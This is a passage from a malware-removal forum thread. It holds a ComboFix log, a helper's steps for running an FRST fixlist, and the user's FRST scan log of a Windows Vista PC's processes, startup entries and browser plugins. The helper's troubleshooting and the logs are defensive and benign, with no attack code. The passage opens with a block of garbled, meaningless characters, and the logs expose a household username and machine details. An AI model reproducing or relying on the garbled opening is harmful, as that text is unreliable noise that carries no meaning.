Xi:j"rU%A^qp\\Pt~pjw$}jjA5joAP3xw}9$p`s/}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`2knPY(.^;[ftXqFqN(/"\^fZArHt8i2Vy[!jYJVxq(x]a4qjEUlT}o9-mw1s^ }wI+..S384^xgWIaN6%aCt("3}q6stys!ti\\^3\q(:HZlq,E`MO24 IsmboGty2om+.H4:jd\y&E\Ma/(o\w^x"q5q6}^s,!t g!F?SG\ }Tp;t45x^T}jY[(U68#`VE99HH(?X8#j^E9f\XpjX4#j^;NGHz 8FNFjzW !^;9s$Zm^!wn?02S0V;Ns,.tUo31/hX1KAA6ZShf}hJ/"\^Z0{|wYPno1!t ZEixj;9MsD}U*9(x"sms,Ajy.z[sVL\pH!Kwz^ 4t(sTv6V9V[2"s4V.UeoIV]hOX]xj;I&]a4y*p( ^;NV.z|;tUeUAF1+.HHy&;tMX/&2Ht8!X(ClV42N}^s,L}j0/FM9V&2)KZ9*9Mj8(j!dZ9X[V.4o#!kFjB8x5ytVT/ qj98x5"H^!d 8.98U5y\VZ2&Z4(?q*!`C"z(U32|U3;jq* (+Y^|Z"AJZ"hdf)/\/ShFKD15ysTeytGWPDVnM^TE#b*Jp+'mR";xvwQJ,kna,^+ -)mJ~ZSq#p81lOm4c#`8)Im^Wdnv#iVw0nAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-06-20 to 2014-07-20  )))))))))))))))))))))))))))))))
.
.
2014-07-20 22:15 . 2014-07-20 22:15 -------- d-----w- c:\users\UpdatusUser\AppData\Local\temp
2014-07-20 22:15 . 2014-07-20 22:15 -------- d-----w- c:\users\MikeandBert\AppData\Local\temp
2014-07-20 22:15 . 2014-07-20 22:15 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-07-20 22:15 . 2014-07-20 22:15 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-07-20 17:47 . 2014-07-02 03:11 8217224 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{8870B1D6-1E5D-496A-A0E0-22F4F44620DE}\mpengine.dll
2014-07-19 22:19 . 2014-07-19 22:19 -------- d-----w- c:\windows\Temp965A39F0-D8D4-45F9-AB4E-7BAA80C34227-Signatures
2014-07-19 21:55 . 2014-07-20 19:22 -------- d-----w- C:\FRST
2014-06-25 17:59 . 2014-06-25 17:59 -------- d-----w- c:\users\MikeandBert\AppData\Local\Adobe
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-07-08 18:28 . 2012-06-14 15:08 699056 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-07-08 18:28 . 2011-10-16 11:39 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-02 03:11 . 2011-04-08 13:43 8217224 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2014-04-26 16:01 . 2014-06-11 20:49 502784 ----a-w- c:\windows\system32\usp10.dll
2012-03-19 06:40 . 2012-03-19 07:24 174008 ----a-w- c:\program files\2pres.dll
2012-04-21 01:19 . 2012-05-27 18:44 97208 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveBlacklistedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedEditOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedEditOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedViewOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSyncingOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"WMPNSCFG"="c:\program files\Windows Media Player\WMPNSCFG.exe" [2008-01-21 202240]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="RtHDVCpl.exe" [2008-06-19 6244896]
"GrooveMonitor"="c:\program files\Microsoft Office\Office12\GrooveMonitor.exe" [2008-10-25 31072]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]
"AVG_TRAY"="c:\program files\AVG\AVG2012\avgtray.exe" [2012-11-20 2598520]
"V0415Mon.exe"="c:\windows\V0415Mon.exe" [2008-08-07 28672]
"Nikon Message Center 2"="c:\program files\Nikon\Nikon Message Center 2\NkMC2.exe" [2011-10-30 571392]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"AvgUninstallURL"="start http://www.avg.com/ww.special-uninstallation-feedback-app?lic=&inst=NwA3AC0ANAAxADMANAA1ADgANwAwADIALQBGAFAAOQArADYALQBCAEEAUgA5AEcAKwAxAC0AVABCADkAKwAyAC0ARgBMACsAOQAtAFgATwAzADYAKwAxAC0ARgA5AE0ANwBDACsANQAtAEYAOQBNADEAMABCACsAMQA&prod=0&ver=9.0.894" [?]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Exif Launcher S.lnk - c:\program files\FinePixViewerS\QuickDCF2.exe [2009-4-9 303104]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ    autocheck autochk *\0c:\progra~1\AVG\AVG2012\avgrsx.exe /sync /restart
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
backup=c:\windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^MikeandBert^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
path=c:\users\MikeandBert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2012-01-03 07:37 843712 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2012-02-21 04:28 59240 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DivXUpdate]
2011-03-21 18:56 1230704 ----a-w- c:\program files\DivX\DivX Update\DivXUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2011-10-10 01:06 421736 ----a-w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2012-04-19 03:56 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation REG_MULTI_SZ    FontCache
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-07-18 14:19 1104200 ----a-w- c:\program files\Google\Chrome\Application\36.0.1985.125\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-07-20 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-06-14 18:28]
.
2014-07-20 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-11-16 09:59]
.
2014-07-20 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-11-16 09:59]
.
.
------- Supplementary Scan -------
.
uStart Page = https://www.google.com/
mStart Page = hxxp://homepage.emachines.com/rdr.aspx?b=ACEW&l=0409&s=1&o=vp32&d=1006&m=el1210-09
uSearchURL,(Default) = hxxp://www.google.com/search/?q=%s
IE: Sothink SWF Catcher - c:\program files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
LSP: %SYSTEMROOT%\system32\nvLsp.dll
TCP: DhcpNameServer = 192.168.1.1
DPF: {8B67B37E-1AE2-4B99-B8CF-55AF4D58DF0D} - file:///F:/win/setup/iamce.dll
DPF: {D8C67FF7-548E-45FD-9B87-0F77758B6B26} - hxxp://redirect.interactual.com/iakey/iakeycomp/109326/iakey.dll
FF - ProfilePath - c:\users\MikeandBert\AppData\Roaming\Mozilla\Firefox\Profiles\icjdnhbo.default\
FF - prefs.js: keyword.URL - hxxp://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=
.
- - - - ORPHANS REMOVED - - - -
.
URLSearchHooks-{32b29df0-2237-4370-9a29-37cebb730e9b} - (no file)
URLSearchHooks-{b2bf7b3f-bf0b-4c48-aec6-f92c51be63e1} - (no file)
WebBrowser-{32B29DF0-2237-4370-9A29-37CEBB730E9B} - (no file)
HKCU-Run-ROC_ROC_APR2013_AV - c:\users\MikeandBert\AppData\Roaming\AVG April 2013 Campaign\AVG-Secure-Search-Update.exe
HKCU-Run-AVG-Secure-Search-Update_0913a - c:\users\MikeandBert\AppData\Roaming\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe
HKLM-Run-eRecoveryService - (no file)
SafeBoot-08317434.sys
SafeBoot-59176720.sys
SafeBoot-WudfPf
SafeBoot-WudfRd
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2446708 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2478663 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2518870 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2539636 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
AddRemove-{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2572078 - c:\windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client\setup.exe
.
.
.
**************************************************************************
scanning hidden processes ... 
.
scanning hidden autostart entries ...
.
scanning hidden files ... 
.
scan completed successfully
hidden files:
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-34897099)
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
Completion time: 2014-07-20  15:24:05
ComboFix-quarantined-files.txt  2014-07-20 22:24
.
Pre-Run: 14,777,839,616 bytes free
Post-Run: 18,161,680,384 bytes free
.
- - End Of File - - F40078A2C2CF7E3A053E02257C416BD4
8C9F9E03865C35F0F3829A23CDA42F5D
 



#6 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:18 AM

Posted 21 July 2014 - 01:53 AM

Ok. Please make sure again that those zombified instances of dllhost.exe are not running and then run the fix from step 1. How is the situation after the reboot?


Step 1

Please download this attached Attached File  fixlist.txt   1.14KB   103 downloads and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button. Allow the reboot.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Start FRST with administator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.

Edited by aharonov, 21 July 2014 - 01:54 AM.


#7 mcgrotty

mcgrotty
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:18 PM

Posted 21 July 2014 - 04:54 PM

That was a significant improvement!  Went 5 hours without another instance opening. Thank-you.

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:20-07-2014
Ran by MikeandBert (administrator) on HOME-PC on 21-07-2014 08:06:58
Running from C:\Users\MikeandBert\Desktop\com fix
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgcsrvx.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Agere Systems) C:\Windows\System32\agrsmsvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgwdsvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgnsx.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.24.15\GoogleCrashHandler.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgtray.exe
(Creative Technology Ltd.) C:\Windows\V0415Mon.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(FUJIFILM Corporation) C:\Program Files\FinePixViewerS\QuickDCF2.exe
(Microsoft Corporation) C:\Program Files\Windows Media Player\wmpnscfg.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe

==================== Registry (Whitelisted) ==================

HKLM\...\RunOnce: [AvgUninstallURL] => cmd.exe /c start http://www.avg.com/ww.special-uninstallation-feedback-app?lic="&"inst=NwA3AC0ANAAxA (the data entry has 174 more characters).
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [WMPNSCFG] => C:\Program Files\Windows Media Player\WMPNSCFG.exe [202240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-165418536-3136176592-1450045568-1003\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Exif Launcher S.lnk
ShortcutTarget: Exif Launcher S.lnk -> C:\Program Files\FinePixViewerS\QuickDCF2.exe (FUJIFILM Corporation)
ShellIconOverlayIdentifiers: GDriveBlacklistedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedEditOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedViewOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncingOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
BootExecute: autocheck autochk * C:\PROGRA~1\AVG\AVG2012\avgrsx.exe /sync /restart

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.emachines.com/rdr.aspx?b=ACEW&l=0409&s=1&o=vp32&d=1006&m=el1210-09
SearchScopes: HKLM - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKLM - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKCU - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7GGLL_en
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7GGLL_en
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: AVG Do Not Track -> {31332EEF-CB9F-458F-AFEB-D30E9A66B6BA} -> C:\Program Files\AVG\AVG2012\avgdtiex.dll (AVG Technologies CZ, s.r.o.)
BHO: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files\AVG\AVG2012\avgssie.dll (AVG Technologies CZ, s.r.o.)
BHO: DivX HiQ -> {593DDEC6-7468-4cdd-90E1-42DADAA222E9} -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKCU - No Name - {EE2AC4E5-B0B0-4EC6-88A9-BCA1A32AB107} -  No File
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {8B67B37E-1AE2-4B99-B8CF-55AF4D58DF0D} file:///F:/win/setup/iamce.dll
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
DPF: {D8C67FF7-548E-45FD-9B87-0F77758B6B26} http://redirect.interactual.com/iakey/iakeycomp/109326/iakey.dll
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll (AVG Technologies CZ, s.r.o.)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Winsock: Catalog9 01 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 02 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 03 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 14 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\MikeandBert\AppData\Roaming\Mozilla\Firefox\Profiles\icjdnhbo.default
FF Keyword.URL: hxxp://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 - C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @checkpoint.com/FFApi - C:\Program Files\CheckPoint\ZAForceField\TrustChecker\bin\npFFApi.dll No File
FF Plugin: @divx.com/DivX Browser Plugin,version=1.0.0 - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @Google.com/GoogleEarthPlugin - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @java.com/JavaPlugin - C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @nvidia.com/3DVision - C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin: @nvidia.com/3DVisionStreaming - C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 - C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 - C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @zoom.us/ZoomVideoPlugin - C:\Users\MikeandBert\AppData\Roaming\Zoom\bin\npzoomplugin.dll (Zoom Video Communications, Inc.)
FF Extension: Lavasoft Search Plugin - C:\Users\MikeandBert\AppData\Roaming\Mozilla\Firefox\Profiles\icjdnhbo.default\Extensions\jid1-yZwVFzbsyfMrqQ@jetpack [2012-12-02]
FF HKLM\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\html5video
FF Extension: DivX Plus Web Player HTML5 &lt;video&gt; - C:\Program Files\DivX\DivX Plus Web Player\firefox\html5video [2011-05-06]
